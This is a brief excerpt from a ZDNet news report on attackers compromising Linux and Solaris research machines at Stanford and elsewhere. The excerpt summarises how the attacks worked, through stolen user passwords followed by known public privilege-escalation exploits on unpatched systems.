ZDNet: Printer Friendly - Attackers infiltrating supercomputer networks:
"Unknown attackers have compromised a large number of Linux and Solaris machines in high-speed computing networks at Stanford University and other academic research facilities, according to an advisory.

The attacks, which apparently compromised servers as recently as April 3, are currently being investigated, according to an advisory posted April 6 by the Information Technology Systems and Services (ITSS) group at Stanford. "

The attacks start with the compromise of an unprivileged local user account. Usually this is because the attacker's captured the password from somewhere else: it's been sniffed off the network (through the use of insecure protocols like telnet), it's been collected when the user signs on to or from another compromised machine, it's been harvested from the password file on a compromised system.

If the target machine is behind on its patches, the attacker then uses one of a number of public exploits to elevate the unprivileged account to root status. Exploits target the Linux mremap() vulnerabilities, the Solaris kernel module loading vulnerability (for which an attack was made public on 8 Apr), and a Solaris priocntl() issue.

http://zdnet.com.com/2102-1105_2-5191024.html?tag=printthis